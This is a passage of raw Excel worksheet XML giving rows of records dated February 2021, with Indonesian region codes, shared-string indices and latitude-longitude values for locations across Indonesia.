      </c>
      <c r="N2969">
        <v>3216111</v>
      </c>
      <c r="O2969">
        <v>3216</v>
      </c>
      <c r="P2969">
        <v>32</v>
      </c>
      <c r="Q2969" t="s">
        <v>10029</v>
      </c>
      <c r="R2969" t="s">
        <v>10030</v>
      </c>
      <c r="S2969" t="s">
        <v>41</v>
      </c>
      <c r="T2969" t="s">
        <v>42</v>
      </c>
      <c r="U2969" s="5">
        <v>10705573</v>
      </c>
      <c r="V2969" s="5" t="s">
        <v>17118</v>
      </c>
      <c r="W2969" s="5">
        <v>-614064</v>
      </c>
      <c r="X2969" t="s">
        <v>20860</v>
      </c>
      <c r="Y2969" t="str">
        <f t="shared" si="46"/>
        <v>-6.14064,107.05573</v>
      </c>
    </row>
    <row r="2970" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2970">
        <v>243336</v>
      </c>
      <c r="B2970" s="1">
        <v>44236</v>
      </c>
      <c r="C2970" s="2">
        <v>0.2978587962962963</v>
      </c>
      <c r="D2970" t="s">
        <v>22</v>
      </c>
      <c r="E2970" t="s">
        <v>23</v>
      </c>
      <c r="F2970" t="s">
        <v>10031</v>
      </c>
      <c r="G2970" t="s">
        <v>10032</v>
      </c>
      <c r="H2970" t="s">
        <v>26</v>
      </c>
      <c r="I2970" t="s">
        <v>137</v>
      </c>
      <c r="J2970" t="s">
        <v>6509</v>
      </c>
      <c r="L2970" t="s">
        <v>10033</v>
      </c>
      <c r="M2970">
        <v>6303052002</v>
      </c>
      <c r="N2970">
        <v>6303052</v>
      </c>
      <c r="O2970">
        <v>6303</v>
      </c>
      <c r="P2970">
        <v>63</v>
      </c>
      <c r="Q2970" t="s">
        <v>10034</v>
      </c>
      <c r="R2970" t="s">
        <v>9004</v>
      </c>
      <c r="S2970" t="s">
        <v>8751</v>
      </c>
      <c r="T2970" t="s">
        <v>6513</v>
      </c>
      <c r="U2970" s="5">
        <v>11482868</v>
      </c>
      <c r="V2970" s="5" t="s">
        <v>17119</v>
      </c>
      <c r="W2970" s="5">
        <v>-336879</v>
      </c>
      <c r="X2970" t="s">
        <v>20861</v>
      </c>
      <c r="Y2970" t="str">
        <f t="shared" si="46"/>
        <v>-3.36879,114.82868</v>
      </c>
    </row>
    <row r="2971" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2971">
        <v>243352</v>
      </c>
      <c r="B2971" s="1">
        <v>44236</v>
      </c>
      <c r="C2971" s="2">
        <v>0.30233796296296295</v>
      </c>
      <c r="D2971" t="s">
        <v>22</v>
      </c>
      <c r="E2971" t="s">
        <v>23</v>
      </c>
      <c r="F2971" t="s">
        <v>10035</v>
      </c>
      <c r="H2971" t="s">
        <v>26</v>
      </c>
      <c r="I2971" t="s">
        <v>197</v>
      </c>
      <c r="J2971" t="s">
        <v>6626</v>
      </c>
      <c r="M2971">
        <v>7371101004</v>
      </c>
      <c r="N2971">
        <v>7371101</v>
      </c>
      <c r="O2971">
        <v>7371</v>
      </c>
      <c r="P2971">
        <v>73</v>
      </c>
      <c r="Q2971" t="s">
        <v>8588</v>
      </c>
      <c r="R2971" t="s">
        <v>8588</v>
      </c>
      <c r="S2971" t="s">
        <v>6629</v>
      </c>
      <c r="T2971" t="s">
        <v>6630</v>
      </c>
      <c r="U2971" s="5">
        <v>11950863</v>
      </c>
      <c r="V2971" s="5" t="s">
        <v>17120</v>
      </c>
      <c r="W2971" s="5">
        <v>-517325</v>
      </c>
      <c r="X2971" t="s">
        <v>20862</v>
      </c>
      <c r="Y2971" t="str">
        <f t="shared" si="46"/>
        <v>-5.17325,119.50863</v>
      </c>
    </row>
    <row r="2972" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2972">
        <v>243368</v>
      </c>
      <c r="B2972" s="1">
        <v>44236</v>
      </c>
      <c r="C2972" s="2">
        <v>0.30398148148148146</v>
      </c>
      <c r="D2972" t="s">
        <v>22</v>
      </c>
      <c r="E2972" t="s">
        <v>23</v>
      </c>
      <c r="F2972" t="s">
        <v>10036</v>
      </c>
      <c r="G2972" t="s">
        <v>10037</v>
      </c>
      <c r="H2972" t="s">
        <v>26</v>
      </c>
      <c r="I2972" t="s">
        <v>137</v>
      </c>
      <c r="J2972" t="s">
        <v>8176</v>
      </c>
      <c r="L2972" t="s">
        <v>10038</v>
      </c>
      <c r="M2972">
        <v>7171051002</v>
      </c>
      <c r="N2972">
        <v>7171051</v>
      </c>
      <c r="O2972">
        <v>7171</v>
      </c>
      <c r="P2972">
        <v>71</v>
      </c>
      <c r="Q2972" t="s">
        <v>10039</v>
      </c>
      <c r="R2972" t="s">
        <v>10040</v>
      </c>
      <c r="S2972" t="s">
        <v>8180</v>
      </c>
      <c r="T2972" t="s">
        <v>8181</v>
      </c>
      <c r="U2972" s="5">
        <v>12485314</v>
      </c>
      <c r="V2972" s="5" t="s">
        <v>17121</v>
      </c>
      <c r="W2972" s="5">
        <v>148779</v>
      </c>
      <c r="X2972" t="s">
        <v>20863</v>
      </c>
      <c r="Y2972" t="str">
        <f t="shared" si="46"/>
        <v>1.48779,124.85314</v>
      </c>
    </row>
    <row r="2973" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2973">
        <v>243429</v>
      </c>
      <c r="B2973" s="1">
        <v>44236</v>
      </c>
      <c r="C2973" s="2">
        <v>0.31877314814814817</v>
      </c>
      <c r="D2973" t="s">
        <v>22</v>
      </c>
      <c r="E2973" t="s">
        <v>23</v>
      </c>
      <c r="F2973" t="s">
        <v>10041</v>
      </c>
      <c r="H2973" t="s">
        <v>7978</v>
      </c>
      <c r="I2973" t="s">
        <v>7983</v>
      </c>
      <c r="J2973" t="s">
        <v>7178</v>
      </c>
      <c r="L2973" t="s">
        <v>10042</v>
      </c>
      <c r="M2973">
        <v>1805080015</v>
      </c>
      <c r="N2973">
        <v>1805080</v>
      </c>
      <c r="O2973">
        <v>1805</v>
      </c>
      <c r="P2973">
        <v>18</v>
      </c>
      <c r="Q2973" t="s">
        <v>10043</v>
      </c>
      <c r="R2973" t="s">
        <v>10044</v>
      </c>
      <c r="S2973" t="s">
        <v>10045</v>
      </c>
      <c r="T2973" t="s">
        <v>2082</v>
      </c>
      <c r="U2973" s="5">
        <v>10521217</v>
      </c>
      <c r="V2973" s="5" t="s">
        <v>17122</v>
      </c>
      <c r="W2973" s="5">
        <v>-493571</v>
      </c>
      <c r="X2973" t="s">
        <v>20864</v>
      </c>
      <c r="Y2973" t="str">
        <f t="shared" si="46"/>
        <v>-4.93571,105.21217</v>
      </c>
    </row>
    <row r="2974" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2974">
        <v>243490</v>
      </c>
      <c r="B2974" s="1">
        <v>44236</v>
      </c>
      <c r="C2974" s="2">
        <v>0.33212962962962961</v>
      </c>
      <c r="D2974" t="s">
        <v>22</v>
      </c>
      <c r="E2974" t="s">
        <v>23</v>
      </c>
      <c r="F2974" t="s">
        <v>10046</v>
      </c>
      <c r="G2974" t="s">
        <v>10047</v>
      </c>
      <c r="H2974" t="s">
        <v>9262</v>
      </c>
      <c r="I2974" t="s">
        <v>10048</v>
      </c>
      <c r="J2974" t="s">
        <v>2622</v>
      </c>
      <c r="L2974" t="s">
        <v>10049</v>
      </c>
      <c r="M2974">
        <v>3511050004</v>
      </c>
      <c r="N2974">
        <v>3511050</v>
      </c>
      <c r="O2974">
        <v>3511</v>
      </c>
      <c r="P2974">
        <v>35</v>
      </c>
      <c r="Q2974" t="s">
        <v>10050</v>
      </c>
      <c r="R2974" t="s">
        <v>10051</v>
      </c>
      <c r="S2974" t="s">
        <v>10052</v>
      </c>
      <c r="T2974" t="s">
        <v>1221</v>
      </c>
      <c r="U2974" s="5">
        <v>11405500</v>
      </c>
      <c r="V2974" s="5" t="s">
        <v>17123</v>
      </c>
      <c r="W2974" s="5">
        <v>-812793</v>
      </c>
      <c r="X2974" t="s">
        <v>20865</v>
      </c>
      <c r="Y2974" t="str">
        <f t="shared" si="46"/>
        <v>-8.12793,114.05500</v>
      </c>
    </row>
    <row r="2975" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2975">
        <v>243611</v>
      </c>
      <c r="B2975" s="1">
        <v>44236</v>
      </c>
      <c r="C2975" s="2">
        <v>0.362337962962963</v>
      </c>
      <c r="D2975" t="s">
        <v>22</v>
      </c>
      <c r="E2975" t="s">
        <v>23</v>
      </c>
      <c r="F2975" t="s">
        <v>10053</v>
      </c>
      <c r="G2975" t="s">
        <v>10054</v>
      </c>
      <c r="H2975" t="s">
        <v>26</v>
      </c>
      <c r="I2975" t="s">
        <v>137</v>
      </c>
      <c r="J2975" t="s">
        <v>6509</v>
      </c>
      <c r="L2975" t="s">
        <v>10055</v>
      </c>
      <c r="M2975">
        <v>6303030015</v>
      </c>
      <c r="N2975">
        <v>6303030</v>
      </c>
      <c r="O2975">
        <v>6303</v>
      </c>
      <c r="P2975">
        <v>63</v>
      </c>
      <c r="Q2975" t="s">
        <v>10056</v>
      </c>
      <c r="R2975" t="s">
        <v>9089</v>
      </c>
      <c r="S2975" t="s">
        <v>8751</v>
      </c>
      <c r="T2975" t="s">
        <v>6513</v>
      </c>
      <c r="U2975" s="5">
        <v>11463508</v>
      </c>
      <c r="V2975" s="5" t="s">
        <v>17124</v>
      </c>
      <c r="W2975" s="5">
        <v>-335092</v>
      </c>
      <c r="X2975" t="s">
        <v>20866</v>
      </c>
      <c r="Y2975" t="str">
        <f t="shared" si="46"/>
        <v>-3.35092,114.63508</v>
      </c>
    </row>
    <row r="2976" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2976">
        <v>243627</v>
      </c>
      <c r="B2976" s="1">
        <v>44236</v>
      </c>
      <c r="C2976" s="2">
        <v>0.36307870370370371</v>
      </c>
      <c r="D2976" t="s">
        <v>22</v>
      </c>
      <c r="E2976" t="s">
        <v>23</v>
      </c>
      <c r="F2976" t="s">
        <v>10057</v>
      </c>
      <c r="G2976" t="s">
        <v>10058</v>
      </c>
      <c r="H2976" t="s">
        <v>26</v>
      </c>
      <c r="I2976" t="s">
        <v>4228</v>
      </c>
      <c r="J2976" t="s">
        <v>2622</v>
      </c>
      <c r="L2976" t="s">
        <v>10059</v>
      </c>
      <c r="M2976">
        <v>3509730002</v>
      </c>
      <c r="N2976">
        <v>3509730</v>
      </c>
      <c r="O2976">
        <v>3509</v>
      </c>
      <c r="P2976">
        <v>35</v>
      </c>
      <c r="Q2976" t="s">
        <v>10060</v>
      </c>
      <c r="R2976" t="s">
        <v>10061</v>
      </c>
      <c r="S2976" t="s">
        <v>6492</v>
      </c>
      <c r="T2976" t="s">
        <v>1221</v>
      </c>
      <c r="U2976" s="5">
        <v>11370590</v>
      </c>
      <c r="V2976" s="5" t="s">
        <v>17125</v>
      </c>
      <c r="W2976" s="5">
        <v>-817094</v>
      </c>
      <c r="X2976" t="s">
        <v>20867</v>
      </c>
      <c r="Y2976" t="str">
        <f t="shared" si="46"/>
        <v>-8.17094,113.70590</v>
      </c>
    </row>
    <row r="2977" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2977">
        <v>243643</v>
      </c>
      <c r="B2977" s="1">
        <v>44236</v>
      </c>
      <c r="C2977" s="2">
        <v>0.33918981481481486</v>
      </c>
      <c r="D2977" t="s">
        <v>85</v>
      </c>
      <c r="E2977" t="s">
        <v>23</v>
      </c>
      <c r="F2977" t="s">
        <v>10062</v>
      </c>
      <c r="G2977" t="s">
        <v>10063</v>
      </c>
      <c r="H2977" t="s">
        <v>26</v>
      </c>
      <c r="J2977" t="s">
        <v>2622</v>
      </c>
      <c r="K2977" t="s">
        <v>10064</v>
      </c>
      <c r="L2977" t="s">
        <v>10065</v>
      </c>
      <c r="M2977">
        <v>3520040017</v>
      </c>
      <c r="N2977">
        <v>3520040</v>
      </c>
      <c r="O2977">
        <v>3520</v>
      </c>
      <c r="P2977">
        <v>35</v>
      </c>
      <c r="Q2977" t="s">
        <v>10066</v>
      </c>
      <c r="R2977" t="s">
        <v>10067</v>
      </c>
      <c r="S2977" t="s">
        <v>10068</v>
      </c>
      <c r="T2977" t="s">
        <v>1221</v>
      </c>
      <c r="U2977" s="5">
        <v>11148429</v>
      </c>
      <c r="V2977" s="5" t="s">
        <v>17126</v>
      </c>
      <c r="W2977" s="5">
        <v>-766318</v>
      </c>
      <c r="X2977" t="s">
        <v>20868</v>
      </c>
      <c r="Y2977" t="str">
        <f t="shared" si="46"/>
        <v>-7.66318,111.48429</v>
      </c>
    </row>
    <row r="2978" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2978">
        <v>243661</v>
      </c>
      <c r="B2978" s="1">
        <v>44236</v>
      </c>
      <c r="C2978" s="2">
        <v>0.37011574074074072</v>
      </c>
      <c r="D2978" t="s">
        <v>22</v>
      </c>
      <c r="E2978" t="s">
        <v>23</v>
      </c>
      <c r="F2978" t="s">
        <v>10069</v>
      </c>
      <c r="G2978" t="s">
        <v>10070</v>
      </c>
      <c r="H2978" t="s">
        <v>26</v>
      </c>
      <c r="I2978" t="s">
        <v>1055</v>
      </c>
      <c r="J2978" t="s">
        <v>2627</v>
      </c>
      <c r="L2978" t="s">
        <v>10071</v>
      </c>
      <c r="M2978">
        <v>3215051003</v>
      </c>
      <c r="N2978">
        <v>3215051</v>
      </c>
      <c r="O2978">
        <v>3215</v>
      </c>
      <c r="P2978">
        <v>32</v>
      </c>
      <c r="Q2978" t="s">
        <v>10072</v>
      </c>
      <c r="R2978" t="s">
        <v>10072</v>
      </c>
      <c r="S2978" t="s">
        <v>3979</v>
      </c>
      <c r="T2978" t="s">
        <v>42</v>
      </c>
      <c r="U2978" s="5">
        <v>10741067</v>
      </c>
      <c r="V2978" s="5" t="s">
        <v>17127</v>
      </c>
      <c r="W2978" s="5">
        <v>-639800</v>
      </c>
      <c r="X2978" t="s">
        <v>20869</v>
      </c>
      <c r="Y2978" t="str">
        <f t="shared" si="46"/>
        <v>-6.39800,107.41067</v>
      </c>
    </row>
    <row r="2979" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2979">
        <v>243779</v>
      </c>
      <c r="B2979" s="1">
        <v>44236</v>
      </c>
      <c r="C2979" s="2">
        <v>0.38604166666666667</v>
      </c>
      <c r="D2979" t="s">
        <v>22</v>
      </c>
      <c r="E2979" t="s">
        <v>23</v>
      </c>
      <c r="F2979" t="s">
        <v>10073</v>
      </c>
      <c r="H2979" t="s">
        <v>26</v>
      </c>
      <c r="I2979" t="s">
        <v>961</v>
      </c>
      <c r="J2979" t="s">
        <v>2622</v>
      </c>
      <c r="L2979" t="s">
        <v>10074</v>
      </c>
      <c r="M2979">
        <v>3517010004</v>
      </c>
      <c r="N2979">
        <v>3517010</v>
      </c>
      <c r="O2979">
        <v>3517</v>
      </c>
      <c r="P2979">
        <v>35</v>
      </c>
      <c r="Q2979" t="s">
        <v>10075</v>
      </c>
      <c r="R2979" t="s">
        <v>9676</v>
      </c>
      <c r="S2979" t="s">
        <v>340</v>
      </c>
      <c r="T2979" t="s">
        <v>1221</v>
      </c>
      <c r="U2979" s="5">
        <v>11214151</v>
      </c>
      <c r="V2979" s="5" t="s">
        <v>17128</v>
      </c>
      <c r="W2979" s="5">
        <v>-757948</v>
      </c>
      <c r="X2979" t="s">
        <v>20870</v>
      </c>
      <c r="Y2979" t="str">
        <f t="shared" si="46"/>
        <v>-7.57948,112.14151</v>
      </c>
    </row>
    <row r="2980" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2980">
        <v>244076</v>
      </c>
      <c r="B2980" s="1">
        <v>44236</v>
      </c>
      <c r="C2980" s="2">
        <v>0.43783564814814818</v>
      </c>
      <c r="D2980" t="s">
        <v>22</v>
      </c>
      <c r="E2980" t="s">
        <v>23</v>
      </c>
      <c r="F2980" t="s">
        <v>10076</v>
      </c>
      <c r="G2980" t="s">
        <v>10077</v>
      </c>
      <c r="H2980" t="s">
        <v>26</v>
      </c>
      <c r="I2980" t="s">
        <v>92</v>
      </c>
      <c r="J2980" t="s">
        <v>8176</v>
      </c>
      <c r="L2980" t="s">
        <v>10078</v>
      </c>
      <c r="M2980">
        <v>7171021009</v>
      </c>
      <c r="N2980">
        <v>7171021</v>
      </c>
      <c r="O2980">
        <v>7171</v>
      </c>
      <c r="P2980">
        <v>71</v>
      </c>
      <c r="Q2980" t="s">
        <v>10079</v>
      </c>
      <c r="R2980" t="s">
        <v>10080</v>
      </c>
      <c r="S2980" t="s">
        <v>8180</v>
      </c>
      <c r="T2980" t="s">
        <v>8181</v>
      </c>
      <c r="U2980" s="5">
        <v>12485652</v>
      </c>
      <c r="V2980" s="5" t="s">
        <v>17129</v>
      </c>
      <c r="W2980" s="5">
        <v>146136</v>
      </c>
      <c r="X2980" t="s">
        <v>20871</v>
      </c>
      <c r="Y2980" t="str">
        <f t="shared" si="46"/>
        <v>1.46136,124.85652</v>
      </c>
    </row>
    <row r="2981" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2981">
        <v>244137</v>
      </c>
      <c r="B2981" s="1">
        <v>44236</v>
      </c>
      <c r="C2981" s="2">
        <v>0.45232638888888888</v>
      </c>
      <c r="D2981" t="s">
        <v>22</v>
      </c>
      <c r="E2981" t="s">
        <v>23</v>
      </c>
      <c r="F2981" t="s">
        <v>10081</v>
      </c>
      <c r="G2981" t="s">
        <v>10082</v>
      </c>
      <c r="H2981" t="s">
        <v>26</v>
      </c>
      <c r="I2981" t="s">
        <v>193</v>
      </c>
      <c r="J2981" t="s">
        <v>10083</v>
      </c>
      <c r="L2981" t="s">
        <v>10084</v>
      </c>
      <c r="M2981">
        <v>3374090001</v>
      </c>
      <c r="N2981">
        <v>3374090</v>
      </c>
      <c r="O2981">
        <v>3374</v>
      </c>
      <c r="P2981">
        <v>33</v>
      </c>
      <c r="Q2981" t="s">
        <v>10085</v>
      </c>
      <c r="R2981" t="s">
        <v>1362</v>
      </c>
      <c r="S2981" t="s">
        <v>1334</v>
      </c>
      <c r="T2981" t="s">
        <v>1134</v>
      </c>
      <c r="U2981" s="5">
        <v>11045840</v>
      </c>
      <c r="V2981" s="5" t="s">
        <v>17130</v>
      </c>
      <c r="W2981" s="5">
        <v>-695841</v>
      </c>
      <c r="X2981" t="s">
        <v>20872</v>
      </c>
      <c r="Y2981" t="str">
        <f t="shared" si="46"/>
        <v>-6.95841,110.45840</v>
      </c>
    </row>
    <row r="2982" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2982">
        <v>244213</v>
      </c>
      <c r="B2982" s="1">
        <v>44236</v>
      </c>
      <c r="C2982" s="2">
        <v>0.46765046296296298</v>
      </c>
      <c r="D2982" t="s">
        <v>22</v>
      </c>
      <c r="E2982" t="s">
        <v>23</v>
      </c>
      <c r="F2982" t="s">
        <v>10086</v>
      </c>
      <c r="G2982" t="s">
        <v>10087</v>
      </c>
      <c r="H2982" t="s">
        <v>26</v>
      </c>
      <c r="I2982" t="s">
        <v>5188</v>
      </c>
      <c r="J2982" t="s">
        <v>2608</v>
      </c>
      <c r="L2982" t="s">
        <v>10088</v>
      </c>
      <c r="M2982">
        <v>3321110012</v>
      </c>
      <c r="N2982">
        <v>3321110</v>
      </c>
      <c r="O2982">
        <v>3321</v>
      </c>
      <c r="P2982">
        <v>33</v>
      </c>
      <c r="Q2982" t="s">
        <v>2056</v>
      </c>
      <c r="R2982" t="s">
        <v>2056</v>
      </c>
      <c r="S2982" t="s">
        <v>1428</v>
      </c>
      <c r="T2982" t="s">
        <v>1134</v>
      </c>
      <c r="U2982" s="5">
        <v>11081612</v>
      </c>
      <c r="V2982" s="5" t="s">
        <v>17131</v>
      </c>
      <c r="W2982" s="5">
        <v>-684336</v>
      </c>
      <c r="X2982" t="s">
        <v>20873</v>
      </c>
      <c r="Y2982" t="str">
        <f t="shared" si="46"/>
        <v>-6.84336,110.81612</v>
      </c>
    </row>
    <row r="2983" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2983">
        <v>244244</v>
      </c>
      <c r="B2983" s="1">
        <v>44236</v>
      </c>
      <c r="C2983" s="2">
        <v>0.47396990740740735</v>
      </c>
      <c r="D2983" t="s">
        <v>22</v>
      </c>
      <c r="E2983" t="s">
        <v>23</v>
      </c>
      <c r="F2983" t="s">
        <v>10089</v>
      </c>
      <c r="G2983" t="s">
        <v>10090</v>
      </c>
      <c r="H2983" t="s">
        <v>26</v>
      </c>
      <c r="I2983" t="s">
        <v>10091</v>
      </c>
      <c r="J2983" t="s">
        <v>6038</v>
      </c>
      <c r="L2983" t="s">
        <v>10092</v>
      </c>
      <c r="M2983">
        <v>1212050024</v>
      </c>
      <c r="N2983">
        <v>1212050</v>
      </c>
      <c r="O2983">
        <v>1212</v>
      </c>
      <c r="P2983">
        <v>12</v>
      </c>
      <c r="Q2983" t="s">
        <v>10093</v>
      </c>
      <c r="R2983" t="s">
        <v>10094</v>
      </c>
      <c r="S2983" t="s">
        <v>8342</v>
      </c>
      <c r="T2983" t="s">
        <v>6043</v>
      </c>
      <c r="U2983" s="5">
        <v>9860090</v>
      </c>
      <c r="V2983" s="5" t="s">
        <v>17132</v>
      </c>
      <c r="W2983" s="5">
        <v>353690</v>
      </c>
      <c r="X2983" t="s">
        <v>20874</v>
      </c>
      <c r="Y2983" t="str">
        <f t="shared" si="46"/>
        <v>3.53690,98.60090</v>
      </c>
    </row>
    <row r="2984" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2984">
        <v>244350</v>
      </c>
      <c r="B2984" s="1">
        <v>44236</v>
      </c>
      <c r="C2984" s="2">
        <v>0.4980324074074074</v>
      </c>
      <c r="D2984" t="s">
        <v>22</v>
      </c>
      <c r="E2984" t="s">
        <v>23</v>
      </c>
      <c r="F2984" t="s">
        <v>10095</v>
      </c>
      <c r="H2984" t="s">
        <v>26</v>
      </c>
      <c r="I2984" t="s">
        <v>961</v>
      </c>
      <c r="J2984" t="s">
        <v>2627</v>
      </c>
      <c r="L2984" t="s">
        <v>10096</v>
      </c>
      <c r="M2984">
        <v>3215113008</v>
      </c>
      <c r="N2984">
        <v>3215113</v>
      </c>
      <c r="O2984">
        <v>3215</v>
      </c>
      <c r="P2984">
        <v>32</v>
      </c>
      <c r="Q2984" t="s">
        <v>10097</v>
      </c>
      <c r="R2984" t="s">
        <v>9969</v>
      </c>
      <c r="S2984" t="s">
        <v>3979</v>
      </c>
      <c r="T2984" t="s">
        <v>42</v>
      </c>
      <c r="U2984" s="5">
        <v>10727839</v>
      </c>
      <c r="V2984" s="5" t="s">
        <v>17133</v>
      </c>
      <c r="W2984" s="5">
        <v>-624843</v>
      </c>
      <c r="X2984" t="s">
        <v>20875</v>
      </c>
      <c r="Y2984" t="str">
        <f t="shared" si="46"/>
        <v>-6.24843,107.27839</v>
      </c>
    </row>
    <row r="2985" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2985">
        <v>244501</v>
      </c>
      <c r="B2985" s="1">
        <v>44236</v>
      </c>
      <c r="C2985" s="2">
        <v>0.53309027777777784</v>
      </c>
      <c r="D2985" t="s">
        <v>22</v>
      </c>
      <c r="E2985" t="s">
        <v>23</v>
      </c>
      <c r="F2985" t="s">
        <v>10098</v>
      </c>
      <c r="G2985" t="s">
        <v>10099</v>
      </c>
      <c r="H2985" t="s">
        <v>26</v>
      </c>
      <c r="I2985" t="s">
        <v>72</v>
      </c>
      <c r="J2985" t="s">
        <v>2608</v>
      </c>
      <c r="L2985" t="s">
        <v>10100</v>
      </c>
      <c r="M2985">
        <v>3319030004</v>
      </c>
      <c r="N2985">
        <v>3319030</v>
      </c>
      <c r="O2985">
        <v>3319</v>
      </c>
      <c r="P2985">
        <v>33</v>
      </c>
      <c r="Q2985" t="s">
        <v>10101</v>
      </c>
      <c r="R2985" t="s">
        <v>889</v>
      </c>
      <c r="S2985" t="s">
        <v>7152</v>
      </c>
      <c r="T2985" t="s">
        <v>1134</v>
      </c>
      <c r="U2985" s="5">
        <v>11081841</v>
      </c>
      <c r="V2985" s="5" t="s">
        <v>17134</v>
      </c>
      <c r="W2985" s="5">
        <v>-684166</v>
      </c>
      <c r="X2985" t="s">
        <v>20876</v>
      </c>
      <c r="Y2985" t="str">
        <f t="shared" si="46"/>
        <v>-6.84166,110.81841</v>
      </c>
    </row>
    <row r="2986" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2986">
        <v>244502</v>
      </c>
      <c r="B2986" s="1">
        <v>44236</v>
      </c>
      <c r="C2986" s="2">
        <v>0.53386574074074067</v>
      </c>
      <c r="D2986" t="s">
        <v>22</v>
      </c>
      <c r="E2986" t="s">
        <v>23</v>
      </c>
      <c r="F2986" t="s">
        <v>10102</v>
      </c>
      <c r="H2986" t="s">
        <v>26</v>
      </c>
      <c r="I2986" t="s">
        <v>1055</v>
      </c>
      <c r="J2986" t="s">
        <v>2627</v>
      </c>
      <c r="L2986" t="s">
        <v>10103</v>
      </c>
      <c r="M2986">
        <v>3215190002</v>
      </c>
      <c r="N2986">
        <v>3215190</v>
      </c>
      <c r="O2986">
        <v>3215</v>
      </c>
      <c r="P2986">
        <v>32</v>
      </c>
      <c r="Q2986" t="s">
        <v>10104</v>
      </c>
      <c r="R2986" t="s">
        <v>10105</v>
      </c>
      <c r="S2986" t="s">
        <v>3979</v>
      </c>
      <c r="T2986" t="s">
        <v>42</v>
      </c>
      <c r="U2986" s="5">
        <v>10723239</v>
      </c>
      <c r="V2986" s="5" t="s">
        <v>17135</v>
      </c>
      <c r="W2986" s="5">
        <v>-610136</v>
      </c>
      <c r="X2986" t="s">
        <v>20877</v>
      </c>
      <c r="Y2986" t="str">
        <f t="shared" si="46"/>
        <v>-6.10136,107.23239</v>
      </c>
    </row>
    <row r="2987" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2987">
        <v>244533</v>
      </c>
      <c r="B2987" s="1">
        <v>44236</v>
      </c>
      <c r="C2987" s="2">
        <v>0.54129629629629628</v>
      </c>
      <c r="D2987" t="s">
        <v>22</v>
      </c>
      <c r="E2987" t="s">
        <v>23</v>
      </c>
      <c r="F2987" t="s">
        <v>10106</v>
      </c>
      <c r="H2987" t="s">
        <v>26</v>
      </c>
      <c r="I2987" t="s">
        <v>10107</v>
      </c>
      <c r="J2987" t="s">
        <v>2627</v>
      </c>
      <c r="L2987" t="s">
        <v>10108</v>
      </c>
      <c r="M2987">
        <v>3215032006</v>
      </c>
      <c r="N2987">
        <v>3215032</v>
      </c>
      <c r="O2987">
        <v>3215</v>
      </c>
      <c r="P2987">
        <v>32</v>
      </c>
      <c r="Q2987" t="s">
        <v>3977</v>
      </c>
      <c r="R2987" t="s">
        <v>3978</v>
      </c>
      <c r="S2987" t="s">
        <v>3979</v>
      </c>
      <c r="T2987" t="s">
        <v>42</v>
      </c>
      <c r="U2987" s="5">
        <v>10725442</v>
      </c>
      <c r="V2987" s="5" t="s">
        <v>17136</v>
      </c>
      <c r="W2987" s="5">
        <v>-632209</v>
      </c>
      <c r="X2987" t="s">
        <v>20878</v>
      </c>
      <c r="Y2987" t="str">
        <f t="shared" si="46"/>
        <v>-6.32209,107.25442</v>
      </c>
    </row>
    <row r="2988" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2988">
        <v>244579</v>
      </c>
      <c r="B2988" s="1">
        <v>44236</v>
      </c>
      <c r="C2988" s="2">
        <v>0.55249999999999999</v>
      </c>
      <c r="D2988" t="s">
        <v>22</v>
      </c>
      <c r="E2988" t="s">
        <v>23</v>
      </c>
      <c r="F2988" t="s">
        <v>10109</v>
      </c>
      <c r="G2988" t="s">
        <v>10110</v>
      </c>
      <c r="H2988" t="s">
        <v>26</v>
      </c>
      <c r="I2988" t="s">
        <v>10111</v>
      </c>
      <c r="J2988" t="s">
        <v>2627</v>
      </c>
      <c r="M2988">
        <v>3213190007</v>
      </c>
      <c r="N2988">
        <v>3213190</v>
      </c>
      <c r="O2988">
        <v>3213</v>
      </c>
      <c r="P2988">
        <v>32</v>
      </c>
      <c r="Q2988" t="s">
        <v>5178</v>
      </c>
      <c r="R2988" t="s">
        <v>5178</v>
      </c>
      <c r="S2988" t="s">
        <v>5179</v>
      </c>
      <c r="T2988" t="s">
        <v>42</v>
      </c>
      <c r="U2988" s="5">
        <v>10782064</v>
      </c>
      <c r="V2988" s="5" t="s">
        <v>17137</v>
      </c>
      <c r="W2988" s="5">
        <v>-628470</v>
      </c>
      <c r="X2988" t="s">
        <v>20879</v>
      </c>
      <c r="Y2988" t="str">
        <f t="shared" si="46"/>
        <v>-6.28470,107.82064</v>
      </c>
    </row>
    <row r="2989" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2989">
        <v>244610</v>
      </c>
      <c r="B2989" s="1">
        <v>44236</v>
      </c>
      <c r="C2989" s="2">
        <v>0.56005787037037036</v>
      </c>
      <c r="D2989" t="s">
        <v>22</v>
      </c>
      <c r="E2989" t="s">
        <v>23</v>
      </c>
      <c r="F2989" t="s">
        <v>10112</v>
      </c>
      <c r="G2989" t="s">
        <v>10113</v>
      </c>
      <c r="H2989" t="s">
        <v>26</v>
      </c>
      <c r="I2989" t="s">
        <v>10114</v>
      </c>
      <c r="J2989" t="s">
        <v>2622</v>
      </c>
      <c r="L2989" t="s">
        <v>10115</v>
      </c>
      <c r="M2989">
        <v>3517010006</v>
      </c>
      <c r="N2989">
        <v>3517010</v>
      </c>
      <c r="O2989">
        <v>3517</v>
      </c>
      <c r="P2989">
        <v>35</v>
      </c>
      <c r="Q2989" t="s">
        <v>10116</v>
      </c>
      <c r="R2989" t="s">
        <v>9676</v>
      </c>
      <c r="S2989" t="s">
        <v>340</v>
      </c>
      <c r="T2989" t="s">
        <v>1221</v>
      </c>
      <c r="U2989" s="5">
        <v>11212942</v>
      </c>
      <c r="V2989" s="5" t="s">
        <v>17138</v>
      </c>
      <c r="W2989" s="5">
        <v>-755987</v>
      </c>
